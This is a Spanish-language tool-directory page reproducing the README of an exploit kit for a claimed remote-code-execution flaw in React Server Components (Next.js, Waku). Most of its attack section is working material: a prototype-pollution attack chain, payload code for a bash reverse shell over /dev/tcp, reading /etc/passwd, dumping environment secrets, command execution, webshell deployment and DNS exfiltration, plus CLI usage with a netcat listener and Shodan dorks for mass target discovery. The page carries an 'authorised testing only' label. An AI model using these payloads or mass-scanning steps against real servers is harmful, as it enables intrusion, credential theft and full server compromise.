Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
PoC-RCE-CVE-2025-55182 — Kit de explotación avanzado de RCE para vulnerabilidades de React Server Components. Incluye múltiples payloads preconstruidos, integración con Shodan para descubrimiento de objetivos y escaneo masivo para pruebas de penetración autorizadas. | Kitploit
Herramientas/GitHubGitHub/ilixm/poc-rce-cve-2025-55182
ReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónComando y ControlRed TeamingHerramienta de Acceso Remoto

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Desarrollo de Payloads
GitHubilixm/poc-rce-cve-2025-55182

PoC-RCE-CVE-2025-55182

Kit de explotación avanzado de RCE para vulnerabilidades de React Server Components. Incluye múltiples payloads preconstruidos, integración con Shodan para descubrimiento de objetivos y escaneo masivo para pruebas de penetración autorizadas.

Ver Repositorio
15hace 9 mesesAún no revisado
Compartir

🔥 RSC RCE Exploit Toolkit

Version License Node Platform

Kit de explotación avanzado para vulnerabilidades de ejecución remota de código en React Server Components

Solo para pruebas de penetración autorizadas e investigación de seguridad

Características • Instalación • Uso • Integración con Shodan • Ejemplos • Aviso legal


📋 Tabla de contenidos

  • Resumen
  • Detalles de la vulnerabilidad
  • Características
  • Instalación
  • Inicio rápido
  • Uso
    • Explotación básica
    • Payloads disponibles
    • Payloads personalizados
  • Integración con Shodan
  • Escaneo automatizado
  • Ejemplos
  • Mitigación
  • Versiones afectadas
  • Contribuciones
  • Aviso legal
  • Licencia

🎯 Resumen

Este kit explota una vulnerabilidad crítica de Ejecución Remota de Código (RCE) en implementaciones de React Server Components (RSC), dirigido específicamente a:

  • Next.js (versiones 13.4.0 - 14.1.0)
  • Waku (versiones vulnerables)

La vulnerabilidad aprovecha la contaminación de prototipos y la deserialización insegura en el mecanismo de manejo de datos de RSC para lograr la ejecución de código arbitrario en el servidor.

🔴 Gravedad: CRÍTICA

  • Puntuación CVSS: 9.8 (Crítica)
  • Vector de ataque: Red
  • Privilegios requeridos: Ninguno
  • Interacción del usuario: Ninguna
  • Impacto: Compromiso total del servidor

🔬 Detalles de la vulnerabilidad

Antecedentes técnicos

React Server Components utiliza un formato de serialización personalizado para transferir datos entre el cliente y el servidor. La vulnerabilidad existe en la forma en que estos frameworks deserializan y procesan payloads especialmente diseñados.

Cadena de ataque:

  1. Construcción del payload: Crear un payload RSC malicioso con referencias circulares
  2. Contaminación de prototipos: Abusar de $X:constructor:constructor para acceder al constructor de funciones
  3. Inyección de código: Inyectar JavaScript arbitrario en el campo _prefix
  4. Ejecución: El servidor deserializa y ejecuta el payload

Flujo de explotación

Atacante → Payload RSC malicioso → Servidor objetivo
                                         ↓
                              Deserialización insegura
                                         ↓
                              Acceso a la cadena de prototipos
                                         ↓
                              Constructor de funciones
                                         ↓
                              ⚠️ RCE LOGRADO ⚠️

✨ Características

Capacidades principales

  • ✅ Soporte para múltiples frameworks: Next.js y Waku
  • ✅ 8 payloads preconstruidos: Desde PoC hasta reverse shells completos
  • ✅ Ejecución de código personalizado: Inyectar cualquier código JavaScript
  • ✅ Integración con Shodan: Descubrimiento automatizado de objetivos
  • ✅ Escaneo masivo: Probar múltiples objetivos automáticamente
  • ✅ CLI profesional: Interfaz de línea de comandos completa
  • ✅ Registro detallado: Salida con códigos de color y marcas de tiempo
  • ✅ Manejo de errores: Gestión robusta de errores

Payloads preconstruidos

PayloadDescripciónCaso de uso
consolePoC básico (console.log)Verificar vulnerabilidad
reverseShellReverse shell en BashAcceso inicial
readFileLeer /etc/passwdAcceso al sistema de archivos
envDumpVolcar variables de entornoExtracción de credenciales
execCommandEjecutar comandos del sistemaEjecución arbitraria de comandos
webshellDesplegar webshell ExpressAcceso persistente
exfilPackageExfiltrar package.jsonAnálisis de dependencias
dnsExfilExfiltración por DNS (OOB)Explotación ciega

📦 Instalación

Prerrequisitos

  • Node.js >= 16.0.0
  • npm o yarn
  • Shodan CLI (opcional, para escaneo automatizado)

Clonar repositorio

git clone https://github.com/yourusername/rsc-rce-exploit.git
cd rsc-rce-exploit

Instalar dependencias

npm install
# o
yarn install

Configurar Shodan (Opcional)

# Instalar Shodan CLI
pip install shodan

# Inicializar con tu clave API
shodan init TU_CLAVE_API

🚀 Inicio rápido

1. Verificación básica de vulnerabilidad

node rsc-rce-exploit.js --target http://objetivo-vulnerable.com --payload console

2. Obtener una reverse shell

# Iniciar listener
nc -lvnp 4444

# Ejecutar exploit
node rsc-rce-exploit.js \
  --target http://objetivo-vulnerable.com \
  --payload reverseShell \
  --lhost 10.10.14.5 \
  --lport 4444

3. Ejecutar comando personalizado

node rsc-rce-exploit.js \
  --target http://objetivo-vulnerable.com \
  --payload execCommand \
  --command "whoami"

📖 Uso

Explotación básica

node rsc-rce-exploit.js [opciones]

Opciones

OpciónDescripciónRequerido
--target <url>URL del objetivo✅
--framework <nombre>Framework: next o waku❌ (por defecto: next)
--payload <nombre>Nombre del payload (ver abajo)✅*
--custom <código>Código JavaScript personalizado✅*
--lhost <ip>Tu IP (para reverse shell)❌
--lport <puerto>Tu puerto (para reverse shell)❌
--command <cmd>Comando a ejecutar❌
--endpoint <ruta>Endpoint RSC personalizado (Waku)❌
--action-id <id>ID de next-action personalizado❌
--listListar payloads disponibles❌
--verboseSalida verbosa❌
--helpMostrar ayuda❌

*Es requerido --payload o --custom

Payloads disponibles

Ver todos los payloads:

node rsc-rce-exploit.js --list

Salida:

📋 Payloads disponibles:

  console              - PoC básico - Salida en consola
    Código: console.log(7*7+1)

  reverseShell         - Reverse shell (bash)
    Código: require('child_process').exec('bash -c "bash -i >& /dev/tcp/LHOST/LPORT 0>&1"')

  readFile             - Leer /etc/passwd
    Código: console.log(require('fs').readFileSync('/etc/passwd','utf8'))

  envDump              - Volcar variables de entorno
    Código: console.log(JSON.stringify(process.env,null,2))

  execCommand          - Ejecutar comando del sistema
    Código: console.log(require('child_process').execSync('COMMAND').toString())

  webshell             - Escribir webshell en /tmp
    Código: require('fs').writeFileSync('/tmp/shell.js','...')

  exfilPackage         - Leer package.json
    Código: console.log(require('fs').readFileSync('./package.json','utf8'))

  dnsExfil             - Exfiltración por DNS
    Código: require('dns').resolve4(Buffer.from(process.env.SECRET||'nosecret')...)

Payloads personalizados

Ejecutar cualquier código JavaScript:

node rsc-rce-exploit.js \
  --target http://objetivo.com \
  --custom "require('fs').readdirSync('.').forEach(f=>console.log(f))"

🌐 Integración con Shodan

Dorks de Shodan

Objetivos Next.js

# Next.js básico
http.component:"Next.js"

# Next.js con RSC
http.html:"__next" http.html:"RSC"
Descargar herramienta